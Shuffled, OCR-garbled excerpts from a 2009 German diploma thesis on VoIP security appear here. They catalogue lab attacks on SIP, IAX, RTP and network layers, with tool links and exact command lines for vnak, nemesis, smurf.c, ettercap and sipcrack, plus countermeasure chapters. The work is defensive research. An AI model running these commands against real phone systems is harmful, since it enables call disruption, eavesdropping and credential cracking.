241. ick auf das ICON welches zuvor bei der Installation auf den Desktop angelegt wurde zu starten Der Internetexplorer wird automatisch gestartet und bringt eine Sicherheitswarnung Es wird Laden dieser Webseite fortsetzen gew hlt Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 20 e0 oo Berner Fachhochschule bae Technik und Informatik Software Schule Schweiz Zertifikatfehler Navigation wurde geblockt Windows Internet Explorer Seas I 2 iive searen Es besteht ein Problem mit dem Sicherheitszertifikat der Website Das Sicherheitszertifikat dieser Website wurde nicht von einer vertrauensw rdigen Zertifizierungsstelle ausgestellt Die Sicherheitszertifikatprobleme deuten eventuell auf den Versuch hin Sie auszutricksen bzw Daten die Sie an den Server gesendet haben abzufangen Es wird empfohlen dass Sie die Webseite schlie en und nicht zu dieser Website wechseln Klicken Sie hier um diese Webseite zu schlie en amp Laden dieser Website fortsetzen nicht empfohlen Die geforderten Login Daten sind einzugeben Dabei handelt es sich um die Login Daten des Betriebssystems welche beim Systemstart von Windows auch eingegeben werden m ssen m VMware Infrastructure Web Access Login Name Admins Password H Hostname testsrv testnetzcitrix1 amp Create Virtual Machine Manufacturer e 3 Virtual Machine to Inventory Model Add Datastore Configure Es i
242. ie Verbindung zum Gespr chspartner dann ebenfalls ab Sein Gespr chspartner gegen ber kriegt von all dem nichts mit sein Sprachkanal bleibt offen und er sendet weiterhin Sprachdaten zum Angriffsziel Schutz gegen Angriff Analyse Siehe Massnahmen Asterisk und Verschl sselung Kapitel 8 2 1 Siehe Massnahmen VLAN und VOIP Kapitel 8 5 14 Kommentar Vnak bietet noch weitere Tools welche f r Angriffe gegen SIP H 323 und IAX eingesetzt werden k nnen Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 100 eo Berner Fachhochschule tee Technik und Informatik Software Schule Schweiz 3 7 2 Technik und Funktionsweise Damit der Angreifer ein korrektes HANHUP Paket an das Angriffsziel senden kann muss vnak bei der Bildung des HANGUP Paketes folgende Komponenten mit ins Paket einbeziehen Source Call ID SCID Destination Call ID DCID Inbound Sequence Number iseq Outbound Sequence Number oseq Erst mit der Integration dieser Komponenten kann das Tool ein giiltiges HANGUP Paket bilden Das Tool bezieht die Angaben fiir diese Komponenten automatisch vom Netzwerk sobald es eine bestehende Verbindung zwischen zwei User Agents detektiert hat Je nach Parameteraufruf dieses Tools kann der Angriff entweder gegen ein einzelnes Ziel oder gegen s mtliche laufenden Gespr chsverbindungen ausgef hrt werden 3 7 3 Ausgangssituation Ablauf und Bedingungen f r Angriff Der Angreifer h
243. ieb seine Antwort bis zum Abgabetermin dieses Berichtes aus Aus Vollst ndigkeits Gr nden wird dieser Angriff hier dennoch aufgef hrt Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 129 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz 5 5 2 Technik und Funktionsweise Der Angreifer h rt den Netzwerkverkehr nach RTP Sprachpaketen ab Sobald sein Angriffsziel aktiv in einem Gespr ch ist kann er sein Angriffs Tool entsprechend konfigurieren und den Angriff starten Damit das Angriffsziel die RTCP BYE Nachricht akzeptiert und nicht gleich verwirft muss diese gespooft mit der IP und MAC Adresse ihres derzeitigen Gespr chspartners an dieses gesendet werden Auch muss das Paket die korrekte SSRC Nummer beinhalten Diese Nummer identifiziert zus tzlich die empfangenen RTP Pakete mit der Identit t des Gespr chspartners Dazu werden Teile der MAC Adresse genommen Wenn das Angriffsziel ein RTCP Paket mit der gleichen SSRC Nummer erh lt wie sie schon im aktuellen bestehenden Gespr ch vorkommt wird das Paket akzeptiert und nicht verworfen Im Glauben die Gegenseite h tte das aktuelle Gespr ch beendet wird das Angriffsziel nach Erhalt dieser gespooften RTCP BYE Nachricht die aktuelle Session und somit das Gespr ch beenden 5 5 3 Ausgangssituation Ablauf und Bedingungen f r Angriff User Agent 4111 und 4129 sind aktiv miteinander in einem Gespr ch Alle RTP Sprachpakete
244. ient m glich T tigt der Angreifer diese Attacken an einem neuralgischen Punkt wie zum Beispiel direkt vor dem Asterisk Proxy Server so kommt er in Kenntnis aller im Netzwerk gesendeten Registration Requestes REGREQ und kann diese entsprechend angreifen Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 99 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz Benennung Angriffe Analyse Angriff Analyse gegen Wert 3 7 1 Denial of Service IAX Hangup Integrit t NEE RE Vertraulichkeit Eingesetztes Tool Verf gbarkeit x vnak Downloadlink Quelle des Tools Schweregrad 1 leicht 6 schwer http www isecpartners com vnak html Hinweise zu Installation Verfiigbarkeit Installation Tool 5 Anwendung Tool 5 Vnak ist unter Linux Unix lauff hig und nicht in BackTrack3 enthalten Erforderliche Vorkenntnisse 5 Gefahrenpotential 1 kleine Gefahr 6 grosse Gefahr Gefahr f r Angriffsziel 5 Ziel Angriff Analyse Der Angriff zielt auf die Verf gbarkeit der IAX Clients ab Das Netzwerk wird nach laufenden Gespr chsverbindungen abgeh rt Wird eine bestehende Verbindung zwischen zwei IAX Clients gefunden wird dem Angriffsziel ein HANGUP Paket gesendet Der IAX Client welcher das Paket empf ngt ist somit im Glauben dass die Gegenseite das Gespr ch beendet hat und bricht d
245. ieser Angriff dennoch aufgef hrt Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 152 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz Benennung Angriffe Analyse Angriff Analyse gegen Wert DOS PING Flood Integritat ER etree teeter rae Vertraulichkeit Eingesetztes Tool Verf gbarkeit x smurf c Downloadlink Quelle des Tools Schweregrad www martnet com johnny exploits network smurf c 1 leicht 6 schwer Hinweise zu Installation Verf gbarkeit Installation Tool 5 Anwendung Tool 5 Smurf c ist nicht in BackTrack3 enthalten Nach dem Herunterladen Erforderliche Vorkenntnisse 5 ist das smurf c wie folgt zu kompilieren Gce smurf c o smurf Gefahrenpotential 1 kleine Gefahr 6 grosse Gefahr Gefahr f r Angriffsziel 5 Ziel Angriff Analyse Der Angreifer sendet eine grosse Menge ICMP PING Echo Requests an eine Liste bestehender interner Hosts Die ICMP PING Requests sind gespooft sie werden also als Source nicht die IP Adresse des Angreifers beinhalten sondern die IP Adresse des Angriffszieles Jeder Host der einen solchen Echo Request erh lt beantwortet diesen indem er ein Echo Replay zur gespooften Source IP Adresse sendet Beim Angriffsziel treffen somit w hrend des Angriffs sehr viele Antworten ein welche es alle abzuarbeiten gilt Somit bleibt f r andere A
246. ifer abgefangen werden Dieser kommt somit in Kenntnis wer wann dem Angriffsziel anruft Auch kann er diese Anrufe beantworten sich mit einer falschen Identit t am Telefon melden und somit eventuell an Informationen gelangen welche nicht f r ihn bestimmt sind Schutz gegen Angriff Analyse Zeit des automatischen Registrierungs Intervalls verk rzen Terminals haben meist einen Standardwert von 3600 Sekunden Das heisst das gehijackte Terminal meldet sich nach Ablauf dieser Zeit wieder automatisch am Registrar an Bis dahin bleibt das Terminal jeweils ankommend unerreichbar TCP f r die SIP Verbindungen verwenden Somit ist eine verbindungsorientierte Kommunikation zum SIP Proxy gegeben in welcher die Pakete durch Sequenznummern gekennzeichnet sind Ein Manipulieren einer solchen Verbindung ist um ein vielfaches erschwerter als eine mit UDP Siehe Massnahmen Authentisierung von SIP Nachrichten Kapitel 8 1 2 Siehe Massnahmen VLAN und VOIP Kapitel 8 5 14 Siehe Massnahmen TLS und SIP Kapitel 8 1 4 Siehe Massnahmen IPSec und SIP Kapitel 8 1 5 Kommentar Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 61 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz 2 9 2 Technik und Funktionsweise Ein angerufener User Agent kann auf eine INVITE mit einer Nachricht 301 MOVED PEMANENTLY antworten Dabei wird im Header dieser Antwort dem Anrufenden mitgeteilt auf w
247. ifizierungs Methode das Passwort nur in Klartext akzeptiert wird Obwohl die Registration Authentication Nachricht des auch antwortenden Asterisk Proxy Servers schneller beim IAX Client eintrifft als die des Angreifers wird der IAX Client auf die Nachricht des Angreifers auch reagieren Der angegriffene TAX Client wird also zuerst dem SIP Proxy Server die Registrierungs Daten als MD5 Hashwert zusenden Danach wird er aber auch der gespooften Aufforderung des Angreifers folgen und sendet dem Asterisk Proxy Server dadurch nochmals die Registrierungs Daten diesmal jedoch in Klartext Der Angreifer schneidet den ganzen Registrierungsverlauf mit und ist danach im Besitz der Registrierungs Daten des User Agents 4131 3 5 3 Ausgangssituation Ablauf und Bedingungen f r Angriff Der Angreifer ist mit dem Netzwerk verbunden und hat Wireshark gestartet IAX Cient 4131 mit der IP Adresse 10 1 1 151 sendet einen Registration Request an den Asterisk Proxy Server Damit der Angreifer die im Netzwerk ausgetauschten INVITE Nachrichten empfangen kann muss die Bedingung gegeben sein in einem geswitchten Netzwerk Daten abhorchen zu k nnen Siehe Kapitel 1 4 Bemerkung Obschon vnak nicht in BackTrack3 enthalten ist wird es aus dem Terminalfenster von BackTrack3 heraus gestartet Vnak wurde zuvor nach BackTrack3 herunter geladen entpackt und kompiliert BackTrack3 bietet eine Menge vorinstallierter Pakete und Hilfsprogramme die f r viele Angriffe zwingend n
248. igen SIP Header auch gesch tzt werden so m ssen zus tzliche Massnahmen wie eine TLS gesch tzte Verbindung eingesetzt werden 813 S MIME und SIP SIP Nachrichten gleichen sehr den E Mail Nachrichten Deshalb wird der fiir E Mails eingesetzte Sicherheitsstandard S MIME auch fiir SIP Nachrichten angewendet Mit S MIME lassen sich signierte und verschliisselte Nachrichten erstellen SIP 2 0 definiert 2 Arten des Einsatzes von S MIME Einerseits wird nur der SDP Body einer SIP Nachricht durch S MIME geschiitzt Damit wird die Authentizitat und Vertraulichkeit dieses SDP Bodys geschiitzt Dadurch sind die im Body enthaltenen Keys welche zur Absicherung des Medienstromes dienen auch geschiitzt SIP Nachrichten welche mittels S MIME geschiitzt sind d rfen nicht durch Server oder Router ver ndert werden ansonsten wird die Nachricht unbrauchbar Damit SIP Proxy Server die Nachrichten bermitteln k nnen d rfen diese nicht vollst ndig verschl sselt werden Ansonsten k nnen die zur bermittlung notwendigen Informationen wie Source und Zieladresse nicht gelesen werden SIP Tunneling ist die zweite in SIP 2 0 definierte Anwendung von S MIME und l st das Problem betreffend der vollst ndigen Verschl sselung der Nachricht Die ganze SIP Nachricht wird dabei verschl sselt und als Body in eine weitere SIP Nachricht verpackt Das nicht geregelte und uneinheitliche Schl sselmanagement von S MIME macht sich gut bemerkbar selten st sst dieses Verfahre
249. ile s Display Options re 7 _ Eee V Update list of packets in real time E Use multiple files Next file every 1 megabyte s V Automatic scrolling in live capture ey 2 minute s 9 Hide capture info dialog fer with 2 files I ai Name Resolution Stop capture after 1 Stop Capture V Enable MAC name resolution El after 1 packet s E Enable network name resolution E after 1 megabyte s F after 1 Bl minutefs p 1 El Enable transport name resolution Help Cancel Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 118 oo Berner Fachhochschule eee Technik und Informatik Software Schule Schweiz Die empfangenen und aufgezeichneten RTP Pakete erscheinen im Hauptfenster von Wireshark Unter Statistics gt VoIP Calls k nnen die einzelnen Gespr chsverbindungen zusammengefasst betrachtet werden race pcap Wireshark Eile Edit View Go Capture Analyze Protocol Hierarchy Conversations Protocol Endpoints 10 Graphs Conversation List Endpoint List Service Response Time ANSI Fax T38 Analysis GSM H 225 MTP3 RTP SCTP SIP Frame 1 42 bytes on wire 4 2 Die Gespr chs Verbindungen werden im Fenster VOIP Calls angezeigt Die gew nschte Verbindung wird mittels Mausklick selektiert und dann auf Player gedr ckt Trace pcap VoIP Calls Dete
250. inal melden Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 52 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz Benennung Angriffe Analyse Angriff Analyse gegen Wert 2 7 1 Registration Hijacking Integrit t nies an x Vertraulichkeit x Eingesetztes Tool Verf gbarkeit x SiVuS Downloadlink Quelle des Tools Schweregrad 1 leicht 6 schwer http www vopsecurity org Hinweise zu Installation Verfiigbarkeit Installation Tool 3 Anwendung Tool 3 SiVus ist nur unter Windows lauff hig Erforderliche Vorkenntnisse 4 Die Installation ist einfach und meniigefihrt SiVus verf gt ber eine ausf hrliche Bedienungsanleitung mit einigen Beispielen zu dessen Einsatz Gefahrenpotential 1 kleine Gefahr 6 grosse Gefahr Gefahr f r Angriffsziel 5 Ziel Angriff Analyse Registration Hijacking gibt es in verschiedenen Varianten blicherweise ist es das Ziel die SIP Registration eines anderen User Agents zu hijacken so dass alle einkommenden und abgehenden Verbindungen auf dem Terminal des Attackers einlaufen respektive gef hrt werden k nnen und der urspr ngliche User Agent der gehijackte nicht mehr erreichbar ist Weitere Varianten des Hijacken sind Hijacking eines User Agents zu einer ung ltigen Destination gt DoS Denial of Service Anrufe des Angri
251. inalfenster von BackTrack3 heraus gestartet Vnak wurde zuvor nach BackTrack3 herunter geladen entpackt und kompiliert BackTrack3 bietet eine Menge vorinstallierter Pakete und Hilfsprogramme die f r viele Angriffe zwingend n tig sind Somit bietet BackTrack3 eine vorinstallierte Basis f r weitere linuxbasierte Angriff Tools welche selbst nicht in BackTrack3 enthalten sind Im Terminalfenster von BackTrack3 werden das Tool und der Angriff mit folgenden Argumenten gestartet Vvnak py a 4 iethO 10 1 1 151 10 1 1 101 Die Werte im Einzelnen stehen wie folgt f r vnak py Aufruf Tool in Python Umgebung a4 Es soll die Registration Reject Attacke von vnak ausgef hrt werden ethO Besagt tiber welche Schnittestelle des PC s die Daten gesendet werden sollen 10 1 1 151 IP Adresse des Zielobjektes an welche die gespoofte Antwort gesendet wird 10 1 1 101 IP Adresse des Asterisk Proxy Servers Krk bt vnak py a 4 iethO 10 1 1 151 10 1 1 101 vnak VoIP Network Attack Kit iSEC Partners Copyright 2007 lt c gt http www isecpartners com Written by Zane Lackey Registration Reject attack completed succesfully against host 10 1 1 151 Registration Reject attack completed succesfully against host 10 1 1 151 KKK In Paket Nr 28 sendet der IAX Client einen Registration Request REGREQ an den Asterisk Proxy Server Mit Paket Nr 29 wird dieser auch schon vom Asterisk Proxy Server best tigt und ihm dabei der Challenge Nonce f r
252. info bob SIP to address sip 4119 10 1 1 101 B From bob lt sip 4119 10 1 1 101 gt tag 5e29673d SIP Display info bob SIP from address sip 4119 10 1 1 101 sIp tag 5e29673d Call ID NmRhnGZz izZzmFmNDVi NMEXMTI4Y2NJYTKOMDA4Yj1hyT I CSeq 1 REGISTER Sequence number 1 Method REGISTER 0020 0030 0040 0050 s 0060 2e738 28 327 353i a3 38 32 36 32 3b 62 72 61 1 151 1 8262 bra 0070 6e 63 68 3d 7a 39 68 47 34 62 4b 2d 64 38 37 35 nch z9hG 4bK d875 K F r ein Registration Hijacking reicht es aus genau diese aufgezeichneten Daten der zuvor gesnifften Registration wieder an den SIP Proxy Server Registrar zu senden jedoch mit abge nderter Contact Information Dies ist mit Hilfe des Tools SiVuS wie folgt zu bewerkstelligen Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 54 e0 oo Berner Fachhochschule Technik und Informatik Software Schule Schweiz SiVuS ffnen Tab SIP ausw hlen und dann den Tab Message Generator selektieren Dann sind die Argumenten gem ss der zuvor gesnifften Registrierung zu machen jedoch wie schon einmal geschrieben mit abge nderter Contact Information Im unteren Beispiel wurde als Contact Information lt sip 4115 10 1 1 241 gt eingegeben somit werden nach dem Absenden der SIP Registrierung durch den Button Start alle ankommenden Anrufe f r die Nummer 4119 bei der Nummer 4115 rufen Nat rlich kann anstelle eines anderen internen User Agents auch
253. ing Protocol Nachricht senden und ihm vorgaukeln dass er selbst ein Switch sei und zur selben Domain geh re Darauf werden zum Angreifer alle Datenpakete welche dieselbe Domain betreffen gesendet Gelingt es einem Angreifer ber ein Trunk Port ein VTP Paket mit h herer Revisionsnummer zu senden kann er die gesamte VTP Domain im Netzwerk l schen Dies ist mit einem Denial of Service zu vergleichen Die Terminals und Server werden sich infolge der lokalen VLAN Konfiguration nicht mehr finden sind somit unerreichbar Um VLAN Hopping zu unterbinden wird Native Tunnel verwendet Zweifach markierte Pakete werden beim VLAN Hopping von einem Switch zu einem andern Switch welcher in einem anderen VLAN ist geleitet Native Tunnel wirkt als Verbindungstunnel zwischen verschiedenen VLAN s Dabei wird kontrolliert ob beim gesendeten Paket die VLAN Tunnel ID mit der VLAN ID des Switches bereinstimmt Wenn keine bereinstimmung vorhanden ist wird das gesendete Paket nicht an den Zielport gesendet VLAN Access Listen VACLs kontrollieren in neuen Switchen den gesamten Datenfluss des VLAN s Somit werden bereits auf Layer 2 mit Filtern VLAN Angriffe abgewehrt 8 5 7 Massnahmen gegen IP Spoofing Spoofing Filter in den Routern und ACLs in den Switchen pr fen den netzwerkinternen Datenverkehr Das F hren der Listen und Filter ist jedoch bei gr sseren Infrastrukturen mit sich viel ndernder Umgebung sehr aufw ndig 8 5 3 Massnahmen gegen ICMP
254. ins Netzwerk gestellt oder auf einem laufenden Rechner eine Malware installiert Nachfolgende Kapitel zeigen Angriffe auf die VOIP Netzwerkinfrastruktur auf Die Angriffe werden auf den Layern 2 3 und 4 ausgef hrt Aufgef hrt werden nur die bekanntesten Angriffe Tools und Anleitungen f r sehr viele weitere Angriffe sind im Internet in entsprechenden Foren zu Gen ge auffindbar Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 133 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz http ettercap sourceforge net Das Tool ist ebenfalls in BackTrack3 enthalten Hinweise zu Installation Verf gbarkeit Das Tool ist in BackTrack3 enthalten Installationsanleitung zu BackTrack3 siehe Kapitel 1 5 2 Benennung Angriffe Analyse Angriff Analyse gegen 6 1 1 ARP Spoofing Integrit t he RE Vertraulichkeit Eingesetztes Tool Verf gbarkeit ettercap Downloadlink Quelle des Tools Schweregrad 1 leicht 6 schwer Installation Tool Anwendung Tool Erforderliche Vorkenntnisse Gefahrenpotential 1 kleine Gefahr 6 grosse Gefahr Gefahr f r Angriffsziel Wert X X X Ziel Angriff Analyse MitM Man in the Middle Attacke genannt Ziel dieses Angriffes ist es in einem geswitchten Netzwerk den Datenaustausch zweier miteinander kommunizierender Hosts abzuh ren Sw
255. iso L EVAN AEE Relationships E USB Controller Auto connect enabled fons nans a L 1 _ Host Machine testsrv testnetzcitrixt Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 24 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz Sollte in der Console untenstehender Hinweis erscheinen so muss noch das Remote Console Plug in installiert werden Dazu ist auf den orangen Link Install plug in zu klicken und entsprechende Dialogfelder zu best tigen Dabei wird derVMware Server komplett geschlossen Dieser ist danach wieder mittels Icon auf dem Desktop zu starten dabei m ssen wiederum Benutzername und Kennwort angegeben werden Please install the VMware Remote Console Plug in to access this virtual machine s console Nach dem Aufstarten des VMware Servers ist untenstehend der Status der virtuellen Maschine BackTrack3 ersichtlich In der oberen Taskliste kann noch der bereits eingesteckte USB Stick zur virtuellen Maschine hinzugef gt werden Somit ist ein Kopieren der Daten von und zu der virtuellen Maschine m glich Um BackTrack3 zu starten wird der TAB Console ausgew hlt a VMware Infrastructure Web Access Administrator testsrw Application Virtual Machine Administration fm 00 gt Hel Inventory I BackTracks Plugged into Host Alcor Micro Mass Storage Device Swissbit pitchBLACK testsrv testnetzeitrixz
256. it View Go Capture Analyze Statistics Help A Eter E Find Backwards Xj Signed 8 bit 93 Signed 32 bit 1483531939 Hexadecimal 5D Unsigned 8 bit 33 Unsigned 32 bit 2811435357 Octal 135 m f x Frame 5 214 bytes on wire 214 bytes captured RER FED 6493 SA RENAA 4 082820E 15 Binary 02011101 a a 2 Internet Protocol Src 10 1 1 129 10 1 1 129 Dst UNSOREAIS HRE gt Set NOR 389034 314 Text User Datagram Protocol Src Port hbci 3000 Dst Por IX Show litte endian decoding Show unsigned as hexsdedimal Stream length Fixed 8 Bit ir o BISHER GEEHRTER m i faut love Z fi at R 0000 00 14 22 fO 22 43 00 08 5d 19 93 a7 08 00 45 80 I anir Me Bsa U a 0010 00 c8 03 f1 00 00 40 11 SECO dal 01 81 0a 01 Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 130 Berner Fachhochschule u Technik und Informatik Software Schule Schweiz Im Terminalfenster wird nemesis von BackTrack 3 aus gestartet Nemesis wird dazu verwendet um ein g ltiges RTCP Paket im Zusammenhang mit dem zuvor vorbereiteten Vorlage RTCP Paket iSEC RTCP BYE DOS erstellen zu k nnen Danach wird der Angriff mit folgenden Argumenten aus nemesis heraus gestartet nemesis udp x 14750 y 14750 S 10 1 1 129 D 10 1 1 101 H 00 08 5d 19 93 47 M 00 14 22 f0 22 43 P iSEC RTCP BYE DOS v Die Werte im Einzelnen stehen wie folgt f r nemesis udp Startet nemesis modus UDP x 14750 ber welches
257. itches verhalten sich nicht gleich wie Hubs welche alle Datenpakete an alle Ports senden Damit der Angreifer dennoch im geswitchten Netzwerk die Datenpakete anderer Ports mitlesen kann leitet er den Datenstrom des Angriffziels ber seinen PC um und sendet ihn dann weiter zum effektiven Bestimmungsort Dabei zeichnet der Angreifer die Daten mittels einem Netzwerkmonitor auf gt Auch Schutz gegen Angriff Analyse Siehe Massnahmen ARP Spoofing Kapitel 8 5 1 Siehe Massnahmen VLAN und VOIP Kapitel 8 5 14 Kommentar Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 134 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz 6 1 2 Technik und Funktionsweise Der Angreifer will den Datenaustausch zweier miteinander kommunizierender Hosts Bsp A und B mith ren Dazu sendet der Angreifer ein manipuliertes ARP Paket an das Angriffsziel A In diesem Paket sendet der Angreifer seine eigene MAC Adresse in Verbindung mit der IP Adresse des anderen Hosts B mit welchem das Angriffsziel kommuniziert an das Angriffsziel A Ab diesem Moment sendet das Angriffsziel A die Pakete welche eigentlich f r den anderen Host B bestimmt w ren an den Angreifer Damit auch Host B seine Pakete an den Angreifer sendet sendet der Angreifer nochmals ein manipuliertes ARP Paket versehen mit seiner eigenen MAC Adresse und der IP Adresse von Host A zum Host B Somit senden beide Hosts Ihre Pake
258. iter scote 10 1 1 241 10 1 1 155 10 1 1 201 Legende Blau betrifft Angriff Kapitel 2 11 1 7129 und 7111 sind SIP User Agents verbunden mit Asterisk Proxy Server Gr n betrifft alle IAX Angriffe 4131 ist ein IAX Softphone Typ Zoiper Rot betrifft alle H 323 Angriffe Der Gatekeeper musste auf PC 10 1 1 241 installiert werden 4151 ist ein H 323 Softphone Typ Ekiga Violett betrifft alle Ascotel Angriffe Orange betrifft Angriff 6 8 1 F r diesen Angriff wurde ein zweiter Gateway ins Netzwerk integriert Schwarz Standard Setup Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 14 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz 1 4 Bedingungen um in einem geswitchten Netzwerk Daten zu sniffen abhorchen In einem geswitchten Netzwerk sendet ein Switch Datenpakete immer nur an den Port an welchem sich auch das f r diese Daten bestimmte Zielsystem IP Telefon VOIP Server Host etc befindet Ein HUB im Gegensatz sendet ungeachtet des Datenzieles immer alle Daten an alle Ports Das heisst alle an diesem HUB angeschlossenen Endsysteme k nnen die Daten der anderen Ports empfangen respektive mitlesen Aus Gr nden der Performance und Sicherheit werden heutzutage deswegen in Netzwerken meistens nur noch Switches eingesetzt Diverse in diesem Diplom Bericht vorgestellte Angriffe bedingen dass der Netzwerkverkehr anderer Ports gesnifft werden kann ein entsprechender Vermerk ist
259. iz Im Ausgabeverzeichnis logins dump werden die gesnifften SIP Registrierungsvorg nge wie folgt abgelegt IP Adresse User Agent IP Adresse Registrar Benutzername User Agent Name Registrar SIP URI Nonce Und der MD5 Hashwert logins dump gedit Datei Bearbeiten Ansicht Suchen Werkzeuge Dokumente Hilfe gt G b u B S A g Neu ffnen Speichern Drucken Jerhol Einf gen Suchen Ersetzen logins dump 10 1 1 151 10 1 1 101 4119 asterisk REGISTER sip 10 1 1 101 4cOad237 DS 03d42b8472000df Sb7 leebbf cobSdba7 10 1 1 151 10 1 1 101 4119 asterisk REGISTER sip 10 1 1 101 6a9b46a1 MDS cScdc 1b9e2b3a17c6Saf f 8a38f c220e2 10 1 1 151 10 1 1 101 4119 asterisk REGISTER sip 10 1 1 101 29d838ec MD5 ce7e879aaabcSef63059573502050e79 Die im Ausgabeverzeichnis logins dump gespeicherten MD5 Hashwerte werden mit folgendem Befehl der Dictionary Attacke unterzogen sudo sipcrack w wordlist final txt logins dump Die Argumente im Einzelnen stehen wie folgt f r sudo sipcrack Aufruf Tool mit Administratorenrechten w wordlist final txt Es soll gegen die Wortliste wordlist final txt gepr ft werden logins dump Ausgabeverzeichnis wo sich die ersnifften MD5 Hashwerte befinden Nach dem Starten des Tools werden alle Eintr ge des Ordners logins dump aufgelistet Mittels Eingabe der Nummer NUM 1 3 kann selektiert werden welcher Eintrag gekrackt werden soll Im Beispiel unten
260. jeweils bei den Angriffen vorhanden Untenstehend wird gezeigt wie diese Bedingung geschaffen werden kann Dazu gibt es diverse Varianten einige davon sind in diesem Diplom Bericht als Angriffe selbst vorgestellt und verweisen in das jeweilige Kapitel 1 4 1 Angreifer stellt eigenen HUB in das Netzwerk Der Angreifer stellt einen eigenen HUB ins Netzwerk und l sst ber diesen die Daten zirkulieren welche er gerne sniffen m chte Je nachdem welche Daten gesnifft werden sollen muss der Ort zum Einsetzen des HUBS gew hlt werden An effektivsten ist das Sniffen bei neuralgischen Punkten wie direkt vor dem Router oder dem VOIP Server Der Angreifer braucht f r diese Variante Zutritt zu den gew nschten Netzwerk Punkten I Q Angreifer VOIP Server Switch Quelle Bild S Sch r selbst erstellt 1 4 2 MAC Flooding Der Switch geht in den Fail Open Mode und verh lt sich wie ein HUB Siehe Angriff Kapitel 6 3 1 1 4 3 ARP Spoofing mit Ettercap Der Datenstrom bestimmter Angriffsziele wird tiber den PC des Angreifers gelenkt Man in the Middle Attacke Siehe Angriff Kapitel 6 1 1 1 4 4 ARP Spoofing Cain amp Abel Der Datenstrom bestimmter Angriffsziele wird tiber den PC des Angreifers gelenkt Man in the Middle Attacke Cain amp Abel ist ein multifunktionales Angriffs Tool basierend auf Windows und kann unter folgendem Link herunter geladen werden http www oxid it cain html Cain amp Abel wird in die
261. kbr cke erstellen diese zusammenf gt Mittels dieser Netzwerkbr cke k nnen dann Daten durch den PC geleitet werden Die Netzwerkbr cke fungiert als Bridge das heisst es k nnen sowohl unterschiedliche Netzsegmente wie auch Netzelemente im gleichen Subnetz miteinender verbunden werden Sobald die Netzwerkbr cke erstellt wird verlieren die beiden physikalischen Netzwerkinterfaces ihre Netzwerkeinstellungen und k nnen auch nicht mehr konfiguriert werden Es wird nur noch ber die Netzwerkbr cke kommuniziert welcher entweder eine feste IP Adresse zugeordnet werden kann oder sie via DHCP eine IP Adresse beziehen l sst Netzwerkverbindungen Datei Bearbeiten Ansicht Favoriten Extras Erweitert G rik r Or Fe Suchen gt Ordner a gt X9 Er Adresse Netzwerkverbindungen Assistent a Assistent f r neue Verbindungen LAN oder Hochgeschwindigkeitsinternet VMware Network Adapter VMware Network Adapter YMneti Mnets E a Verbindung hergestellt ts a Verbindung hergestellt Netzwerkbr cke Netzwerkbr cke Schema Testlabor Setup f r STP Angriff gt gt Siehe Seite 151 Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 147 e0 oo Berner Fachhochschule Technik und Informatik Software Schule Schweiz Untenstehend sind die Einstellungen der Netzwerkbr cke aufgezeigt hier f r DHCP konfiguriert Zu sehen ist auch wie sie die beiden LAN Verbindungen Netzwerkin
262. keeper bernimmt die Rolle eines Schl sselverteilers Das Ziel von H 235 4 ist Angriffe auf schwache Passw rter zu vermeiden Da das Passwort mit symmetrischer Verschl sselung und dem Diffie Hellman Verfahren bertragen wird kann dies gew hrleistet werden 8 3 5 Substandard H 235 5 Authentifizierung in RAS bei Verwendung schwacher Shared Secrets Das unsichere Aushandeln von Shard Secrets diese sind anf llig gegen Brute Force Angriffe zwischen Endpoint und Gatekeeper soll unter Verwendung von Public Key Verfahren sicherer werden Auch sch tzt H 235 5 gegen Man in the Middle Attacken In Kombination mit Diffie Hellman bietet H 235 ein Schl sselgenerierungs und Austauschverfahren welches nur ber ein Passwort gesichert ist 8 3 6 Substandard H 235 6 Sprachverschl sselung mit nativem H 235 H 245 Schl sselmanagement H 235 6 stellt die Vertraulichkeit der Sprachdaten sicher indem es die Mechanismen f r das native H 235 H 245 Schl sselmanagement liefert Gleichzeitig dient es als Erweiterung zur Absicherung der Signalisierung der Standards H 235 1 bis H 235 3 Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 189 eo Berner Fachhochschule tee Technik und Informatik Software Schule Schweiz 8 3 7 Substandard H 235 7 Anwendung des MIKEY Schliisselmanagementprotokolls f r SRTP H 235 7 beschreibt die Verwendung des MIKEY IETF Standards als Schl sselmanagementprotokoll f r SRTP in H 323 MIKEY bietet
